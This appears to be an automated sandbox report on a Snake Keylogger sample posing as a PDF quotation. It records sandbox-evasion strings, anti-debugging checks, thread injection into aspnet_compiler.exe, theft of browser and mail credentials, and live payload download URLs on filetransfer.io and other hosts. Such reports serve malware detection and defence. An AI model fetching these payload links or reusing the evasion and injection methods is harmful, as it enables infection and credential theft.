Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: explorer SbieDll.dll!cuckoomon.dll"win32_process.handle='{0}'#ParentProcessId$cmd%select * from Win32_BIOS8Unexpected WMI query failure&version'SerialNumber)VMware\|VIRTUAL\|A M I\|Xenselect from Win32_ComputerSystem+manufacturer,model-Microsoft\|VMWare\|Virtual.john/anna0xxxxxxxx
Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638031213.000001195CF86000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3318801194.000001F59DEBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Code function: 0_2_00007FF8491619F5 CheckRemoteDebuggerPresent,

0_2_00007FF8491619F5

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Thread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe EIP: 9DD20000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1F59DD20000

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319881103.000001F59FBCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319881103.000001F59FBCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 Scheduled Task/Job	211 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	51 Virtualization/Sandbox Evasion	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	211 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	51 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	18%	ReversingLabs	Win64.Trojan.Generic

Source	Detection	Scanner	Label
https://s24.filetransfer.io/storage/download/72vwG3nYeuAb	0%	Avira URL Cloud	safe
http://crl.micros1	0%	Avira URL Cloud	safe
https://s24.filetransfer.io	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s24.filetransfer.io	188.114.96.3	true	false	high
filetransfer.io	188.114.96.3	true	false	high
reallyfreegeoip.org	188.114.97.3	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://filetransfer.io/data-package/u7ghXEYp/download	false		high
https://filetransfer.io/data-package/u7ghXEYp/download	false		high
http://checkip.dyndns.org/	false		high
https://s24.filetransfer.io/storage/download/72vwG3nYeuAb	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.75	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-neti	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.75p	aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micros1	aspnet_compiler.exe, 00000004.00000002.3322566875.000001F5B82E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	aspnet_compiler.exe, 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp	false		high
http://reallyfreegeoip.org	aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FAB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://filetransfer.io	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBE2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org	aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FAE0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB84000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmp	false		high
http://filetransfer.io	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBA1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s24.filetransfer.io	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	aspnet_compiler.exe, 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
188.114.96.3	s24.filetransfer.io	European Union	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560140
Start date and time:	2024-11-21 13:07:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe renamed because original name is a hash value
Original Sample Name:	QUOTATION_NOVQTRA071244PDF.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 70% Number of executed functions: 110 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Simulations

Behavior and APIs

Time	Type	Description
07:07:58	API Interceptor	93164x Sleep call for process: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe modified
07:09:01	API Interceptor	8767x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
188.114.96.3	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/7pdXjNKP/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
	REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
s24.filetransfer.io	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr	Get hash	malicious	FormBook	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
filetransfer.io	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rBankRemittance_pdf.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rPO3799039985.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.67.200.96
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	MV BBG MUARA Ship's Particulars.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	https://bitly.cx/aMW9O9	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htm	Get hash	malicious	BlackHacker JS Obfuscator	Browse	104.17.25.14
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	CHARIKLIA JUNIOR DETAILS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
CLOUDFLARENETUS	MV BBG MUARA Ship's Particulars.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	https://bitly.cx/aMW9O9	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
